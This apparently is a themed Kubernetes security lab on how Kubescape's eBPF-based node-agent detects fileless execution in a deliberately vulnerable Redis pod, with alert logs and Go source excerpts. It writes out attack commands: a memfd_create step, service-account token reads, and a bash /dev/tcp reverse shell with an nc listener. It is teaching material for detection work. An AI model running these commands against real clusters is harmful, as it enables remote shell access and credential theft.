/var/run/secrets/kubernetes.io/serviceaccount/token","comm":"3","ppid":99320,"pcomm":"containerd-shim","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","path":"memfd:pwned"},"containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227"},"level":"error","message":"Unexpected process launched: 3 with PID 116061","msg":"Unexpected process launched","processtree_depth":"1","time":"2026-03-01T17:14:23Z"}
{"BaseRuntimeMetadata":{"alertName":"Fileless execution detected","arguments":{"apChecksum":"c8759f370c607e8afa444a8e2cf6d816e894256856d0e59c429c9e326d2fdd53","args":["/proc/self/fd/3","/var/run/secrets/kubernetes.io/serviceaccount/token"],"exec":"/proc/self/fd/3","message":"Fileless execution detected: exec call \"3\" is from a malicious source"},"infectedPID":116061,"severity":8,"timestamp":"2026-03-01T17:14:23.514675324Z","trace":{},"uniqueID":"90e172c0dfb727a19e4b8b39e2b89e9d","identifiers":{"process":{"name":"3","commandLine":"/proc/self/fd/3 /var/run/secrets/kubernetes.io/serviceaccount/token"},"file":{"name":"memfd:pwned","directory":"."}}},"CloudMetadata":null,"RuleID":"R1005","RuntimeK8sDetails":{"clusterName":"default","containerName":"redis","hostNetwork":false,"image":"ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10","imageDigest":"sha256:deef18281b522c341a1664c85077e6bba7498c20ca92a93bec18375a44d467be","namespace":"redis","containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227","podName":"redis-54f999cb48-rcpjv","podNamespace":"redis","podUID":"1e89d54b-ec36-41bb-bc82-2028bcde62bb","podLabels":{"app.kubernetes.io/name":"redis","app.kubernetes.io/version":"7.2.10","pod-template-hash":"54f999cb48"},"workloadName":"redis","workloadNamespace":"redis","workloadKind":"Deployment","workloadUID":"2cfaafda-69b7-4124-854b-771803fd9021"},"RuntimeProcessDetails":{"processTree":{"pid":116061,"cmdline":"/proc/self/fd/3 /var/run/secrets/kubernetes.io/serviceaccount/token","comm":"3","ppid":99320,"pcomm":"containerd-shim","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","path":"memfd:pwned"},"containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227"},"level":"error","message":"Fileless execution detected: exec call \"3\" is from a malicious source","msg":"Fileless execution detected","processtree_depth":"1","time":"2026-03-01T17:14:23Z"}
{"BaseRuntimeMetadata":{"alertName":"Unexpected service account token access","arguments":{"apChecksum":"c8759f370c607e8afa444a8e2cf6d816e894256856d0e59c429c9e326d2fdd53","flags":["O_RDONLY"],"message":"Unexpected access to service account token: /run/secrets/kubernetes.io/serviceaccount/..2026_03_01_17_06_29.4186941470/token with flags: O_RDONLY","path":"/run/secrets/kubernetes.io/serviceaccount/..2026_03_01_17_06_29.4186941470/token"},"infectedPID":116061,"severity":5,"timestamp":"2026-03-01T17:14:23.515848016Z","trace":{},"uniqueID":"eccbc87e4b5ce2fe28308fd9f2a7baf3","profileMetadata":{"status":"completed","completion":"complete","name":"replicaset-redis-54f999cb48","failOnProfile":true,"type":0},"identifiers":{"process":{"name":"3"},"file":{"name":"token","directory":"/run/secrets/kubernetes.io/serviceaccount/..2026_03_01_17_06_29.4186941470"}}},"CloudMetadata":null,"RuleID":"R0006","RuntimeK8sDetails":{"clusterName":"default","containerName":"redis","hostNetwork":false,"image":"ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10","imageDigest":"sha256:deef18281b522c341a1664c85077e6bba7498c20ca92a93bec18375a44d467be","namespace":"redis","containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227","podName":"redis-54f999cb48-rcpjv","podNamespace":"redis","podUID":"1e89d54b-ec36-41bb-bc82-2028bcde62bb","workloadName":"redis","workloadNamespace":"redis","workloadKind":"Deployment","workloadUID":"2cfaafda-69b7-4124-854b-771803fd9021"},"RuntimeProcessDetails":{"processTree":{"pid":116061,"cmdline":"/proc/self/fd/3 /var/run/secrets/kubernetes.io/serviceaccount/token","comm":"3","ppid":99320,"pcomm":"containerd-shim","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","path":"memfd:pwned"},"containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227"},"level":"error","message":"Unexpected access to service account token: /run/secrets/kubernetes.io/serviceaccount/..2026_03_01_17_06_29.4186941470/token with flags: O_RDONLY","msg":"Unexpected service account token access","processtree_depth":"1","time":"2026-03-01T17:14:23Z"}
{"BaseRuntimeMetadata":{"alertName":"Syscalls Anomalies in container","arguments":{"apChecksum":"c8759f370c607e8afa444a8e2cf6d816e894256856d0e59c429c9e326d2fdd53","message":"Unexpected system call detected: readlink with PID 99476","syscall":"readlink"},"infectedPID":99476,"md5Hash":"e86b9933a697eea115b852c5be170fb2","sha1Hash":"ab2e96f4cedbd556f73dd1bcf16dee496d1b1482","severity":1,"size":"10 MB","timestamp":"2026-03-01T17:14:40.332453349Z","trace":{},"uniqueID":"7ae8bea4fa0e4bc42167bb3a680f1686","profileMetadata":{"status":"completed","completion":"complete","name":"replicaset-redis-54f999cb48","failOnProfile":true,"type":0},"identifiers":{"process":{"name":"redis"}}},"CloudMetadata":null,"RuleID":"R0003","RuntimeK8sDetails":{"clusterName":"default","containerName":"redis","hostNetwork":false,"image":"ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10","imageDigest":"sha256:deef18281b522c341a1664c85077e6bba7498c20ca92a93bec18375a44d467be","namespace":"redis","containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227","podName":"redis-54f999cb48-rcpjv","podNamespace":"redis","podUID":"1e89d54b-ec36-41bb-bc82-2028bcde62bb","podLabels":{"app.kubernetes.io/name":"redis","app.kubernetes.io/version":"7.2.10","pod-template-hash":"54f999cb48"},"workloadName":"redis","workloadNamespace":"redis","workloadKind":"Deployment","workloadUID":"2cfaafda-69b7-4124-854b-771803fd9021"},"RuntimeProcessDetails":{"processTree":{"pid":99476,"cmdline":"redis-server 0.0.0.0:6379","comm":"redis-server","ppid":99320,"pcomm":"containerd-shim","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","cwd":"/","path":"/usr/local/bin/redis-server"},"containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227"},"level":"error","message":"Unexpected system call detected: readlink with PID 99476","msg":"Syscalls Anomalies in container","processtree_depth":"1","time":"2026-03-01T17:14:40Z"}
{"BaseRuntimeMetadata":{"alertName":"Syscalls Anomalies in container","arguments":{"apChecksum":"c8759f370c607e8afa444a8e2cf6d816e894256856d0e59c429c9e326d2fdd53","message":"Unexpected system call detected: fadvise64 with PID 99476","syscall":"fadvise64"},"infectedPID":99476,"md5Hash":"e86b9933a697eea115b852c5be170fb2","sha1Hash":"ab2e96f4cedbd556f73dd1bcf16dee496d1b1482","severity":1,"size":"10 MB","timestamp":"2026-03-01T17:14:40.342927946Z","trace":{},"uniqueID":"840a89954c4149cca50949888cfdb6a6","profileMetadata":{"status":"completed","completion":"complete","name":"replicaset-redis-54f999cb48","failOnProfile":true,"type":0},"identifiers":{"process":{"name":"redis"}}},"CloudMetadata":null,"RuleID":"R0003","RuntimeK8sDetails":{"clusterName":"default","containerName":"redis","hostNetwork":false,"image":"ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10","imageDigest":"sha256:deef18281b522c341a1664c85077e6bba7498c20ca92a93bec18375a44d467be","namespace":"redis","containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227","podName":"redis-54f999cb48-rcpjv","podNamespace":"redis","podUID":"1e89d54b-ec36-41bb-bc82-2028bcde62bb","podLabels":{"app.kubernetes.io/name":"redis","app.kubernetes.io/version":"7.2.10","pod-template-hash":"54f999cb48"},"workloadName":"redis","workloadNamespace":"redis","workloadKind":"Deployment","workloadUID":"2cfaafda-69b7-4124-854b-771803fd9021"},"RuntimeProcessDetails":{"processTree":{"pid":99476,"cmdline":"redis-server 0.0.0.0:6379","comm":"redis-server","ppid":99320,"pcomm":"containerd-shim","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","cwd":"/","path":"/usr/local/bin/redis-server"},"containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227"},"level":"error","message":"Unexpected system call detected: fadvise64 with PID 99476","msg":"Syscalls Anomalies in container","processtree_depth":"1","time":"2026-03-01T17:14:40Z"}
{"BaseRuntimeMetadata":{"alertName":"Syscalls Anomalies in container","arguments":{"apChecksum":"c8759f370c607e8afa444a8e2cf6d816e894256856d0e59c429c9e326d2fdd53","message":"Unexpected system call detected: move_pages with PID 99476","syscall":"move_pages"},"infectedPID":99476,"md5Hash":"e86b9933a697eea115b852c5be170fb2","sha1Hash":"ab2e96f4cedbd556f73dd1bcf16dee496d1b1482","severity":1,"size":"10 MB","timestamp":"2026-03-01T17:14:40.378468605Z","trace":{},"uniqueID":"d5ff80e564058e4b1ce10fecdfb64053","profileMetadata":{"status":"completed","completion":"complete","name":"replicaset-redis-54f999cb48","failOnProfile":true,"type":0},"identifiers":{"process":{"name":"redis"}}},"CloudMetadata":null,"RuleID":"R0003","RuntimeK8sDetails":{"clusterName":"default","containerName":"redis","hostNetwork":false,"image":"ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10","imageDigest":"sha256:deef18281b522c341a1664c85077e6bba7498c20ca92a93bec18375a44d467be","namespace":"redis","containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227","podName":"redis-54f999cb48-rcpjv","podNamespace":"redis","podUID":"1e89d54b-ec36-41bb-bc82-2028bcde62bb","podLabels":{"app.kubernetes.io/name":"redis","app.kubernetes.io/version":"7.2.10","pod-template-hash":"54f999cb48"},"workloadName":"redis","workloadNamespace":"redis","workloadKind":"Deployment","workloadUID":"2cfaafda-69b7-4124-854b-771803fd9021"},"RuntimeProcessDetails":{"processTree":{"pid":99476,"cmdline":"redis-server 0.0.0.0:6379","comm":"redis-server","ppid":99320,"pcomm":"containerd-shim","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","cwd":"/","path":"/usr/local/bin/redis-server"},"containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227"},"level":"error","message":"Unexpected system call detected: move_pages with PID 99476","msg":"Syscalls Anomalies in container","processtree_depth":"1","time":"2026-03-01T17:14:40Z"}
{"BaseRuntimeMetadata":{"alertName":"Syscalls Anomalies in container","arguments":{"apChecksum":"c8759f370c607e8afa444a8e2cf6d816e894256856d0e59c429c9e326d2fdd53","message":"Unexpected system call detected: memfd_create with PID 99476","syscall":"memfd_create"},"infectedPID":99476,"md5Hash":"e86b9933a697eea115b852c5be170fb2","sha1Hash":"ab2e96f4cedbd556f73dd1bcf16dee496d1b1482","severity":1,"size":"10 MB","timestamp":"2026-03-01T17:14:40.393691896Z","trace":{},"uniqueID":"63e927ab32c6c56d320a6d818cb4bda3","profileMetadata":{"status":"completed","completion":"complete","name":"replicaset-redis-54f999cb48","failOnProfile":true,"type":0},"identifiers":{"process":{"name":"redis"}}},"CloudMetadata":null,"RuleID":"R0003","RuntimeK8sDetails":{"clusterName":"default","containerName":"redis","hostNetwork":false,"image":"ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10","imageDigest":"sha256:deef18281b522c341a1664c85077e6bba7498c20ca92a93bec18375a44d467be","namespace":"redis","containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227","podName":"redis-54f999cb48-rcpjv","podNamespace":"redis","podUID":"1e89d54b-ec36-41bb-bc82-2028bcde62bb","podLabels":{"app.kubernetes.io/name":"redis","app.kubernetes.io/version":"7.2.10","pod-template-hash":"54f999cb48"},"workloadName":"redis","workloadNamespace":"redis","workloadKind":"Deployment","workloadUID":"2cfaafda-69b7-4124-854b-771803fd9021"},"RuntimeProcessDetails":{"processTree":{"pid":99476,"cmdline":"redis-server 0.0.0.0:6379","comm":"redis-server","ppid":99320,"pcomm":"containerd-shim","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","cwd":"/","path":"/usr/local/bin/redis-server"},"containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227"},"level":"error","message":"Unexpected system call detected: memfd_create with PID 99476","msg":"Syscalls Anomalies in container","processtree_depth":"1","time":"2026-03-01T17:14:40Z"}

Step 5: Verify the alert

In another Terminal3, lets grep for the specific alert that we ll be tracking throughout the dungeon code-base:

kubectl logs -n kubescape -l app=node-agent -c node-agent --tail=50 | grep "R1005"

You should see: "Fileless execution detected: exec call \"3\" is from a malicious source" with severity 8, MITRE tactic TA0005, technique T1055.

The gates of the dungeon creak open. Your torch flickers. Nine chambers await. Let us begin the ascent.

Rooms 1-2 -- Kernel Depths & Gadget's Outpost

Room 1: The Kernel Depths

You descend into the deepest chamber. Millions of syscalls echo off the walls. The Kernel processes them all without judgment. A legitimate cat /etc/hosts looks identical to execve("/proc/self/fd/3"). The Kernel does not care.

The ApplicationProfile -- the Tome of Behavior
           userspace (Redis container)
           β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
           β”‚  perl: memfd_create("pwned", 0)  β”‚  ← syscall 319 (x86) / 279 (arm)
           β”‚        write(fd, /bin/cat)       β”‚
           β”‚        execve("/proc/self/fd/3") β”‚  ← this is the event we trace
           β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
  ─────────────────── kernel boundary ───────────────────
                          β”‚
           β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β–Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
           β”‚  Linux kernel:                   β”‚
           β”‚  1. memfd_create β†’ returns fd=3  β”‚
           β”‚  2. write β†’ copies binary to fd  β”‚
           β”‚  3. execve β†’ resolves /proc/     β”‚
           β”‚     self/fd/3 β†’ anon inode       β”‚
           β”‚  4. Maps into memory, runs it    β”‚
           β”‚                                  β”‚
           β”‚  Checks: uid/gid permissions βœ“   β”‚
           β”‚  Does NOT check: intent βœ—        β”‚
           β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

Two syscalls matter for our (pseudo)-exploit:

  • memfd_create("pwned", 0) --- creates an anonymous RAM-backed file. No filesystem path. Returns fd=3.
  • execve("/proc/self/fd/3", ["cat", "...token..."]) --- replaces the process with the binary in that fd. The kernel resolves it through procfs and executes.

The kernel treats execve("/usr/bin/cat") and execve("/proc/self/fd/3") identically. Both pass permission checks. Neither triggers any alert on its own.

Quest: Fire the syscall

Step 1 β€” create the memfd only (observe the fd number):

REDIS_POD=$(kubectl -n redis get pod -l app.kubernetes.io/name=redis \
  -o jsonpath='{.items[0].metadata.name}')

kubectl -n redis exec "$REDIS_POD" -- perl -e '
my $n = "bob123";
my $fd = syscall(319, $n, 0);
print "memfd fd=$fd\n";
'

You'll see memfd fd=3 β€” the first free fd after stdin(0), stdout(1), stderr(2). Each kubectl exec spawns a fresh process, so fd=3 is always available.

Step 2 β€” Inspect the logs and find the syscalls:

Check the node-agent logs again (maybe you still have your second terminal open).

kubectl logs -n kubescape -l app=node-agent -c node-agent | grep "memfd_create"

There is quite some noise, as syscalls by themselves are hard to filter. We are interested that the above line my $fd = syscall(319, $n, 0); really executed the memfd_create syscall, and that the kernel processed it.

You could construct rules directly on the basis of this single syscall. However, this is rather brittle. You ll see below that the approach taken is slightly different: We obviously need that syscall be executed for the pseudo-exploit to work, but the alert-rule, will watch for a more robust tell...

let's consider the other parts of the fileless exec to understand why


Room 2: Gadget's Outpost

A green-cloaked ranger waits at the crossroads, eyes closed in concentration. Glowing eBPF threads extend from his fingertips into the kernel. Each thread vibrates when a matching syscall fires.

  β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
  β”‚  node-agent pod  (ns: kubescape)                               β”‚
  β”‚                                                                β”‚
  β”‚  ExecTracer.Start()                                            β”‚
  β”‚       β”‚                                                        β”‚
  β”‚       β–Ό                                                        β”‚
  β”‚  β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”   β”‚
  β”‚  β”‚ Inspektor Gadget runtime.RunGadget()                    β”‚   β”‚
  β”‚  β”‚                                                         β”‚   β”‚
  β”‚  β”‚  eBPF image: trace_exec:v0.48.1                         β”‚   β”‚
  β”‚  β”‚  Operators:                                             β”‚   β”‚
  β”‚  β”‚    1. kubeManager    ── K8s enrichment (pod, ns, labels)β”‚   β”‚
  β”‚  β”‚    2. ociHandler     ── OCI image handling              β”‚   β”‚
  β”‚  β”‚    3. ExecOperator   ── arg buffer parsing (Room 3)     β”‚   β”‚
  β”‚  β”‚    4. eventOperator  ── our subscription callback       β”‚   β”‚
  β”‚  β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜   β”‚
  β”‚                             β”‚ every execve in every container  β”‚
  β”‚                             β–Ό                                  β”‚
  β”‚                     DatasourceEvent{                           β”‚
  β”‚                       exepath: "/proc/self/fd/3"               β”‚
  β”‚                       comm: "3"                                β”‚
  β”‚                       args: "cat /var/run/.../token"           β”‚
  β”‚                       pid: 51120                               β”‚
  β”‚                       timestamp: <nanoseconds>                 β”‚
  β”‚                     }                                          β”‚
  β”‚                             β”‚                                  β”‚
  β”‚                             β–Ό                                  β”‚
  β”‚                     callback() ── filter: retVal > -1          β”‚
  β”‚                             β”‚                                  β”‚
  β”‚                             β–Ό                                  β”‚
  β”‚                     handleEvent() ── enrichEvent()             β”‚
  β”‚                             β”‚                                  β”‚
  β”‚                             β–Ό                                  β”‚
  β”‚                     eventCallback (β†’ OrderedEventQueue)        β”‚
  β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

The ExecTracer loads the trace_exec eBPF gadget into the kernel. From that moment, every execve in every container on the node triggers the probe.

For our fileless exec, we thus focus on the fact that something was executed in a suspicious way, rather than on the syscall. The probe captures:

FieldValueHow accessed
exepath/proc/self/fd/3 or memfd:pwnedGetExePath()
comm3 (the execved binary name)GetComm()
argscat /var/run/.../tokenGetArgs()
proc.pid51120GetPID()
proc.parent.commperlGetPcomm()
timestamp_rawnanosecond boot-timeGetTimestamp()
Source code -- ExecTracer.Start() loads the eBPF probe

pkg/containerwatcher/v2/tracers/...

func (et *ExecTracer) Start(ctx context.Context) error {
    et.gadgetCtx = gadgetcontext.New(ctx,
        execImageName, 
        gadgetcontext.WithDataOperators(
            et.kubeManager,
            ocihandler.OciHandler,
            NewExecOperator(),
            et.eventOperator(),
        ),
        ...
    )
    go func() {
        params := map[string]string{
            "operator.oci.ebpf.paths":    "true",
            "operator.LocalManager.host": "true",
        }
        err := et.runtime.RunGadget(et.gadgetCtx, nil, params)
        ...
    }()
    return nil
}

If you wanted to use a custom gadget, you would start here to copy the structure and insert your own image. Kubescape uses the OCI based gadgets since November 2025.
Source code -- eventOperator subscribes to the eBPF datasource

pkg/containerwatcher/v2/tracers/exec.go:109-124

func (et *ExecTracer) eventOperator() operators.DataOperator {
    return simple.New(string(utils.ExecveEventType),
        simple.OnInit(func(gadgetCtx operators.GadgetContext) error {
            for _, d := range gadgetCtx.GetDataSources() {
                d.Subscribe(func(source datasource.DataSource, data datasource.Data) error {
                    et.callback(&utils.DatasourceEvent{
                        Datasource: d,
                        Data:       source.DeepCopy(data),
                        EventType:  utils.ExecveEventType,
                    })
                    return nil
                }, opPriority)
            }
            return nil
        }),
    )
}

This is how the data is normalized from a gadget into the rest of the node-agent.

Quest: Watch the probes load

Loading the gadgets into the kernel is a delicate process. Loading too many at once can cause various errors. If you are ever missing events, it's worth checking if any of gadgets failed to load.

kubectl get pods -n kubescape -l app=node-agent -o wide
kubectl logs -n kubescape -l app=node-agent -c node-agent --tail=200 |grep -i "tracer\|gadget"

Find in the source code of node-agent, which gadget is being loaded and where they are defined.

solution
{"level":"info","ts":"2026-03-21T14:50:26Z","msg":"Starting procfs tracer before other tracers"}
{"level":"info","ts":"2026-03-21T14:50:26Z","msg":"ProcfsTracer started successfully"}
{"level":"info","ts":"2026-03-21T14:50:56Z","msg":"Started tracer","tracer":"trace_exec","count":1}
{"level":"info","ts":"2026-03-21T14:50:58Z","msg":"Started tracer","tracer":"trace_open","count":2}
{"level":"info","ts":"2026-03-21T14:51:00Z","msg":"Started tracer","tracer":"trace_kmod","count":3}
{"level":"info","ts":"2026-03-21T14:51:02Z","msg":"Started tracer","tracer":"trace_randomx","count":4}
{"level":"info","ts":"2026-03-21T14:51:04Z","msg":"Started tracer","tracer":"trace_bpf","count":5}
{"level":"info","ts":"2026-03-21T14:51:06Z","msg":"Started tracer","tracer":"trace_hardlink","count":6}
{"level":"info","ts":"2026-03-21T14:51:08Z","msg":"Started tracer","tracer":"trace_http","count":7}
{"level":"info","ts":"2026-03-21T14:51:10Z","msg":"Started tracer","tracer":"trace_dns","count":8}
{"level":"info","ts":"2026-03-21T14:51:12Z","msg":"Started tracer","tracer":"trace_unshare","count":9}
{"level":"info","ts":"2026-03-21T14:51:14Z","msg":"Started tracer","tracer":"syscall_tracer","count":10}
{"level":"info","ts":"2026-03-21T14:51:16Z","msg":"Started tracer","tracer":"trace_fork","count":11}
{"level":"info","ts":"2026-03-21T14:51:18Z","msg":"Started tracer","tracer":"trace_capabilities","count":12}
{"level":"info","ts":"2026-03-21T14:51:20Z","msg":"Started tracer","tracer":"trace_symlink","count":13}
{"level":"info","ts":"2026-03-21T14:51:22Z","msg":"Started tracer","tracer":"trace_ssh","count":14}
{"level":"info","ts":"2026-03-21T14:51:24Z","msg":"Started tracer","tracer":"trace_ptrace","count":15}
{"level":"info","ts":"2026-03-21T14:51:26Z","msg":"Using iouring gadget image","image":"ghcr.io/inspektor-gadget/gadget/iouring_old:latest","kernelVersion":"6.1.160","major":6,"minor":1}
{"level":"info","ts":"2026-03-21T14:51:26Z","msg":"Started tracer","tracer":"trace_iouring","count":16}
{"level":"info","ts":"2026-03-21T14:51:28Z","msg":"Started tracer","tracer":"trace_exit","count":17}
{"level":"info","ts":"2026-03-21T14:51:30Z","msg":"Started tracer","tracer":"trace_network","count":18}

Inspector Gadget's threads vibrate. An execve("/proc/self/fd/3") has fired in the Redis container. The eBPF probe captures exepath, PID, args, timestamp. The event flows to the Scribes.


Rooms 3-4 -- Scribe's Chamber & Hall of Time

Room 3: The Scribe's Chamber

Tireless scribes receive raw scrolls from Inspector Gadget --- a jumble of null-terminated bytes --- and translate them into structured records the rest of the dungeon can read.

        eBPF ring buffer                                                ExecOperator
  β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”                  β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
  β”‚ args: "cat\0/var/run/secrets/.../token\0" β”‚ ──────────────>  β”‚ args: ["cat", "/var/run/secrets/.../token] β”‚
  β”‚ args_size: 52                             β”‚                  β”‚                                            β”‚
  β”‚ args_count: 2                             β”‚                  β”‚                                            β”‚
  β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜                  β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
         raw bytes                                                               typed Go struct

The ExecOperator is the scribe for exec events. It reads the raw null-terminated argument buffer from eBPF and splits it into a string slice joined by consts.ArgsSeparator.

For our fileless exec, the raw bytes cat\0/var/run/secrets/kubernetes.io/serviceaccount/token\0 become the args list ["cat", "/var/run/secrets/.../token"].

The other key field --- exepath --- comes directly from the eBPF probe. No parsing needed.

Source code -- GetExePath() reads exepath from eBPF datasource

pkg/utils/datasource_event.go

func (e *DatasourceEvent) GetExePath() string {
    switch e.EventType {
    case ExecveEventType, ...:
        exepath, _ := e.getFieldAccessor("exepath").String(e.Data)
        return exepath
    }
}

This is the value that R1005 will check against event.exepath.contains('memfd').

Bonus Quest: The Reverse Shell Serpent

The Reverse Shell Serpent

A different monster lurks in the Scribe's Chamber. The Reverse Shell Serpent slithers through bash redirections that look innocent to simple process monitors --- but the Scribe's arg parser sees everything.

Before we hunt the Serpent, look at how the trace_exec gadget chains its operators. Each operator runs in priority order, transforming the raw eBPF data before the next one sees it:

The ExecOperator at priority 1 transforms raw bytes into structured data before the eventOperator at priority 50000 copies and dispatches the event.

Source code of exec.go

pkg/containerwatcher/v2/tracers/exec.go:56-69

et.gadgetCtx = gadgetcontext.New(ctx, execImageName,
    gadgetcontext.WithDataOperators(
        et.kubeManager,            // K8s metadata
        ocihandler.OciHandler,     
        NewExecOperator(),         // priority 1: parse args    
        et.eventOperator(),        // priority 50000: dispatch  
    ),
)

Lower priority runs first so the Scribe always finishes parsing before the Messenger dispatches.

Challenge: Catch a live reverse shell from inside a pod.

Create the three terminals for the rev shell

You need three terminals. Terminal 1 watches the node-agent alerts. Terminal 2 catches the shell. Terminal 3 fires the exploit.

# Terminal 1 β€” watch alerts in real time
kubectl logs -n kubescape -l app=node-agent -c node-agent -f \
  | jq -r 'select(.RuleID) | "\(.BaseRuntimeMetadata.timestamp) \(.RuleID) \(.message)"'

start a listener on the dev-machine

MY_IP=$(hostname -I | awk '{print $1}')
echo "Listening on $MY_IP:4444 ..."
nc -lvnp 4444

In another terminal, create the reverse shell from the Redis pod

REDIS_POD=$(kubectl -n redis get pod -l app.kubernetes.io/name=redis \
  -o jsonpath='{.items[0].metadata.name}')
MY_IP=$(hostname -I | awk '{print $1}')
kubectl -n redis exec "$REDIS_POD" -- \
  bash -c "bash -i >& /dev/tcp/$MY_IP/4444 0>&1"

In Terminal 2 you should see a bash prompt arrive --- you are now inside the Redis container. Try hostname, id, cat /var/run/secrets/kubernetes.io/serviceaccount/token. You now are watching what an attacker is executing after gaining a foothold.

In Terminal 1, R0001 fires immediately (amongst many R0003)

2026-03-13T19:15:14.054563529Z R0001 Unexpected process launched: bash with PID 124110
2026-03-13T19:15:14.049730148Z R0001 Unexpected process launched: bash with PID 124104
2026-03-13T19:16:30.665779638Z R0001 Unexpected process launched: hostname with PID 126718 #assuming you ran `hostname` inside the caught shell

What comes from Inspector Gadget (the eBPF tracer):

kubectl exec uses the container runtime (runc) to call execve("/usr/bin/bash", ["/usr/bin/bash", "-c", "bash -i >& /dev/tcp/172.16.0.2/4444 0>&1"]) inside the container. The eBPF probe writes the argv array into a ring buffer as null-terminated bytes:

  Raw eBPF buffer (args field):
  β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”¬β”€β”€β”€β”€β”¬β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”
  β”‚ /usr/bin/bash β”‚\0β”‚ -c β”‚\0β”‚ bash -i >& /dev/tcp/172.16.0.2/4444 0>&1     β”‚\0β”‚
